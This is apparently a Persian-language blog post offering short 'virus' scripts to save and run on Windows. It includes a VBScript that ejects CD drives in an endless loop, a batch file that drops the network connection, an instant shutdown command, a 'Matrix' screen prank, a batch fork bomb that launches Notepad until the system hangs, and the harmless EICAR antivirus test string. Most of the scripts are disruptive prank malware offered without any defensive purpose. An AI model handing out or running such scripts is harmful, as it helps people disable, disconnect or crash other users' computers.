کد ویروس خارج کننده CD-ROM

پسوند ذخیره سازی : VBS

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

کد ویروس تست کننده آنتی ویروس ها

نام فایل برای ذخیره سازی : EICAR.COM

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

کد بدافزار قطع کننده اینترنت ویندوز

پسوند ذخیره سازی : bat

@Echo off
Ipconfig /release

کد ویروس ماتریکس ویندوز

پسوند ذخیره سازی : bat

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

کد بدافزار خاموش کننده ویندوز

shutdown /s /t 0

کد ویروس هنگ و کرش کردن ویندوز

پسوند ذخیره سازی : bat

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

دسته بندی شده در: